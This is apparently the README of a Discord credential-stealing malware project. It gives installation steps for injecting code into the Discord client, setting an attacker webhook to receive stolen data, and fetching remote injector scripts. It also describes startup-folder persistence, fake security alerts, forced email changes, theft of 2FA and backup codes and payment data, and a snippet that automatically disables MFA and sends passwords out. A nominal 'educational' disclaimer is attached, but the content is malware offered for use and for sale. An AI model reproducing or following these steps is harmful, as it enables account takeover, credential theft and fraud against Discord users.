Interception of Discord HTTP Requests, Including Backup Code Retrieval and Deceptive User Alerts for Vulnerabilities, Among Other Techniques!
Discord Injection is a tool designed to showcase the interception of HTTP requests within the Discord application. This tool highlights potential vulnerabilities by capturing critical actions and interactions that occur within Discord.
-
Persistence and Startup:
- Once the victim is injected, and everything is perfect, they simply will not be able to remove the injection.
- Persistence works in such a way that once the user starts their Discord application, an executable is simply created that will check if it contains an injection. If so, it will not be modified, but if not, it will be injected again More information here
-
Forced mail change & edit user:
- If this setting is enabled in the automatic change mail injection, then the victim will see a fake security alert & Also if the automatic user modification configuration is active, user data will be modified
-
Login & Authentication:
- Intercept login, registration, and two-factor authentication (2FA) requests.
-
Account Management:
- Capture requests related to email and password changes.
-
Security codes:
- Obtains all the victim's security codes at capture time.
-
Payment Information:
- Monitor credit card and PayPal addition requests.
-
Security Measures:
- Automatic logout after the initial injection to prevent unauthorized access.
- QR Code login prevention to enhance security.
- Block requests that reveal device information.
-
Close Discord: Ensure that Discord is completely closed before proceeding.
-
Copy the Injection Code:
- Download the injection code and insert it into your Discord desktop core. Navigate to:
%APPDATA%\Local\Discord\app-<app-version>\modules\discord_desktop_core-<core-version>\discord_desktop_core\index.js
- Download the injection code and insert it into your Discord desktop core. Navigate to:
-
Configure Setup:
-
Replace
%WEBHOOK_URL%
in the injected code with your Discord webhook URL. This webhook will receive the intercepted information. -
Replace
%API_URL%
with our api you can get a unique url where you will get detailed information of the victims. -
Replaces data like
%AUTO_USER_PROFILE_EDIT%
,%AUTO_EMAIL_UPDATE%
which are a separate configuration in case you want to have an improvement in the attack. -
Important this do not change it
injection_url: "https://raw.githubusercontent.com/k4itrun/discord-injection/main/injection.js", injector_url: "https://raw.githubusercontent.com/k4itrun/discord-vbs-injector/main/injector.vbs",
-
-
Restart Discord: Launch Discord again to apply the changes.
- Node.js Injector:
- For a more feature-rich injector based on Node.js, visit Wish Stealer. It's a free tool with extensive capabilities.
-
Persistence Vbs Malware:
- Once the victim is injected, several instances will be created on the PC in parallel, simply once the victim is trapped they will not be able to leave.
An autostart task is created on multiple routes as in
%APPDATA%\Microsoft\Protect
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
- Firstly, the Injector Malware will be stored here and will be executed whenever the PC starts.
if(CONFIG.auto_mfa_disabler === 'true') {
await delay(5000);
const autoMfadisablerToken = await autoMfadisabler(response, token, 'backup');
content = {
content: `**${user.username}** mfa was deactivated automatically!`,
embeds: [{
fields: [
{ name: "Password", value: `\`${password}\``, inline: true },
{ name: "Email", value: `\`${email}\``, inline: true },
],
}],
};
notify(content, autoMfadisablerToken, user);
};
If you are interested in an improved version with more features such as auto mfa deactivator and premium options you can buy it
We welcome your contributions to this project! If you have suggestions or improvements, please feel free to open an issue or submit a pull request with your changes. Your involvement from the community is highly valued.
You can support the development of this project by making a donation, which helps bring new, optimized, and improved projects to life. Alternatively, you can simply add a ⭐ star to this repository.
Thank you for your interest and support! ✌️
For inquiries, reach out at [email protected] or join our Discord Server.
This software is licensed under the MIT License.
This tool is designed solely for educational purposes. Any misuse of this tool is strictly prohibited. By using this tool, you acknowledge and accept these terms.
By utilizing this tool, you take full responsibility for your actions. The creator disclaims any liability for misuse. It is your responsibility to ensure that your use of this software complies with all applicable laws and regulations.
The creator will not provide assistance or support for any misuse of this tool. Any inquiries related to harmful or illegal activities will be ignored.
By using this tool, you agree to abide by this disclaimer. If you do not agree with these terms, please do not use the software.